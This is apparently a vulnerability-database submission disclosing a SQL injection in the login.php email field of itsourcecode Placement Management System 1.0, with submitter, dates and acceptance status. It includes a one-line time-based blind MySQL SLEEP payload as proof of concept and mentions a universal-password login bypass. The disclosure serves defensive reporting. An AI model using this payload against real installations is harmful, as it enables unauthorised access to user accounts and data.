| Titel | itsourcecode Placement Management System 1.0 SQLi |
|---|
| Beschreibung | In the login.php file, the email field is not properly sanitized, which may lead to SQL injection vulnerabilities. Additionally, as long as there is any data in the users table of the database, it is possible to log in using a universal password.
————————Poc————————————
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]#' AND (SELECT 3451 FROM (SELECT(SLEEP(5)))zIEe) AND 'NilV'='NilV&pass=123 |
|---|
| Quelle | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-1.md |
|---|
| Benutzer | Dee.Mirage (UID 71702) |
|---|
| Einreichung | 31.07.2024 16:15 (vor 2 Jahren) |
|---|
| Moderieren | 03.08.2024 08:49 (3 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 273540 [itsourcecode Placement Management System 1.0 login.php email SQL Injection] |
|---|
| Punkte | 20 |
|---|